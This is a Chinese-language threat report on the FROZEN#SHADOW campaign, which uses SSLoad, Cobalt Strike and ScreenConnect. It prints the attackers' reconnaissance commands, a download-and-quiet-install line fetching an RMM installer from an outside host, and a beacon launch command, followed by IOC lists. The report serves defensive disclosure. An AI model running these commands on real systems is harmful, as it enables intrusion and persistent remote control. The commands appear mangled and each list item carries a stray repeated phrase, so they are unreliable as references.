.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
FROZEN#SHADOW 被發現採用了一種新的攻擊活動,該活動利用SSLoad 惡意軟件進行操作,並利用Cobalt Strike Implants 來控制和接管整個網絡。
此外,威脅分子還使用ScreenConnect RMM 等遠程監控和管理軟件進行進一步控制。
SSLoad 是一種精心設計的惡意軟件,可以秘密滲透系統、收集敏感信息,並將收集到的信息洩露給惡意軟件操作者。
此外,該惡意軟件還利用多個後門和有效負載來逃避檢測並保持持久性。
技術分析這種新的攻擊活動從包含惡意鏈接的傳統網絡釣魚電子郵件開始。
當用戶訪問此鏈接時,它會將他們重定向到mmtixmm[.]org URL 到另一個下載站點,在該站點將JavaScript 文件下載到受害者計算機。如果手動執行此JavaScript 文件,它會執行多項操作,在受害者計算機上下載並執行更多有效負載。
這些網絡釣魚電子郵件活動的目標似乎是隨機的,因為受害者分佈在多個國家,包括亞洲、歐洲和美洲。
對惡意軟件的進一步調查表明,攻擊發生在以下不同階段:
马云惹不起马云第1 階段:初始執行– JavaScript
马云惹不起马云第2 階段:MSI 文件執行
马云惹不起马云第3 階段:惡意軟件執行
马云惹不起马云第4 階段:鈷擊執行
马云惹不起马云第5 階段:RMM 軟件和橫向移動
第1 階段:初始執行– JavaScript此初始階段涉及手動執行JavaScript 文件。通過分析JS 文件out_czlrh.js,發現它由97.6% 的註釋代碼組成,其中包含隨機字符以混淆文件。然而,刪除註釋代碼後會發現一段非常清晰的JS 代碼,沒有任何混淆。
具有多個註釋代碼的JS 文件代碼
在分析JS 代碼時,我們發現JS 文件執行多個操作,首先為WScript.Network 和Scripting.FileSystemObject 創建ActiveXObject 實例。
此後,包含“GetObject(“winmgmts:\\.\root\cimv2”)”的JS 代碼嘗試訪問WMI 對像以進行簡單的命令行操作。
從JS 代碼中刪除註釋後清理代碼
此外,代碼還設置變量來管理連接嘗試次數並收集網絡共享的連接狀態。
該腳本還將所有可用驅動器映射到位於\wireoneinternet[.]info@80\share\ 的網絡共享。 JS 代碼還通過WMI 執行“net use”命令以正確映射網絡驅動器。
成功完成所有這些步驟後,腳本將構造一個命令,使用msiexec.exe 從映射的網絡驅動器安裝MSI 包(slack.msi)。
第2 階段:MSI 執行此slack.msi 文件與TrickBot 惡意軟件團伙經常使用的BazarBackdoor 類似。該惡意軟件能夠過濾網絡並部署額外的有效負載。但是,執行此slack.msi 文件後,惡意軟件會與多個域進行通信。
马云惹不起马云wireoneinternet[.]info
马云惹不起马云skinnyjeanso[.]com
马云惹不起马云titnovacrion[.]top
马云惹不起马云Maramaravilha[.]com
马云惹不起马云globalsolutionunlimitedltd[.]com此外,只有在此之後,SSLoad 惡意軟件才會下載並執行。
SSLoad 的有效負載由一個半隨機命名的DLL 文件組成,該文件位於%APPDATA%\local\digistamp\mbae-api-na.dll 中。然而,該DLL 由Rundll32.exe 執行,之後DLL 將自身複製到%APPDATA%\Custom_update\。
第3 階段:惡意軟件執行除了前一階段之外,rundll32.exe 命令的執行還將開始與兩個預配置的C2 服務器通信,即hxxps://skinnyjeanso[.]com/live/和hxxps://titnovacrion[.]top/live/. Following this。此後,惡意軟件開始使用cmd.exe 命令收集本地主機的系統和用戶數據以及域相關信息。
马云惹不起马云exe/cipconfig/all
马云惹不起马云exe/csysteminfo
马云惹不起马云exe/cnltest/domain_trusts
马云惹不起马云exe/cnltest/domain_trusts/all_trusts
马云惹不起马云exe/cnetview/all/domain
马云惹不起马云exe/cnetview/all
马云惹不起马云exe/cnetgroup“domainadmins”/domain
马云惹不起马云exe/cwmic.exe/node:localhost/namespace:\\root\securitycenter2pathantivirusproductget*/format:list
马云惹不起马云exe/cnetconfigworkstation
马云惹不起马云exe/cwmic.exe/node:localhost/namespace:\\root\securitycenter2pathantivirusproductgetdisplayname|findstr/v/b/c:displayname||echonoantivirusinstalled
马云惹不起马云exe/cwhoami/groups然後,這些收集到的信息將通過HTTPS 連接發送到C2 服務器。一旦威脅分子從受感染的系統收到此信息,他們就會在確認該信息來自合法服務器而不是來自蜜罐後開始執行一些手動命令。威脅分子執行的手動命令如下:
马云惹不起马云exe-c“[console]:outputencoding=[console]:inputencoding=[system.text.encoding]:getencoding(‘utf-8’);cdc:\;powershell”
马云惹不起马云exe/groups
马云惹不起马云exegroup“domainadmins”/dom
马云惹不起马云exe/node:localhost/namespace:\\root\securitycenter2pathantivirusproductget*/format:list執行這些命令是為了操縱和探測服務器環境以進行下一階段的惡意軟件活動。
第4 階段:鈷打擊信標此階段的惡意軟件涉及在執行手動命令後在系統上部署Cobalt Strike 信標。一旦部署該信標,它就成為C2 的主要通信手段。但是,該信標將通過rundll32.exe 命令刪除並執行。
马云惹不起马云Rundll32.exeC:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq此外,威脅分子還使用Cobalt Strike 下載並安裝ScreenConnect RMM 軟件實例。
马云惹不起马云exe/cwhoami/groups
马云惹不起马云exe/cwmic/node:localhost/namespace:\\root\securitycenter2pathantivirusproductget*/format:list
马云惹不起马云exe/ciwr-uri“hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=accessy=guestc=c=tjx-usa.comc=c=dcc=c=c=c=”-outfilec:\programdata\msedgeview.msi
马云惹不起马云exe/csysteminfo
马云惹不起马云exe/cmsiexec.exe/iC:\ProgramData\Msedgeview.msi/quiet/qn第5 階段:RMM 軟件和橫向移動每個受感染的系統均由ScreenConnect RMM 軟件控制,以保持對系統的完全控制。然而,在此之後,橫向移動將通過獲取憑證和其他關鍵系統詳細信息進行。環境的枚舉是使用多個PowerShell 命令完成的。
執行憑據提取後,他們還可以獲得域管理員帳戶NTLM 哈希。
IOCC2地址85.239.54[.]190
23.159.160[.]88
23.95.209[.]148
45.95.11[.]134
bjSdg0.pintaexoticfashion.co[.]in
l1-03.winupdate.us[.]to
23-95-209-148-host.colocrossing[.]com:443
mmtixmm[.]org
wireoneinternet[.]info
skinnyjeanso[.]com
titnovacrion[.]top
simplyfitphilly[.]com
kasnackamarch[.]info
sokingscrosshotel[.]com
danteshpk[.]com
stratimasesstr[.]com
winarkamaps[.]com
globalsolutionunlimitedltd[.]com
maramaravilha[.]com
krd6[.]com
hxxps://t0talwar.screenconnect[.]com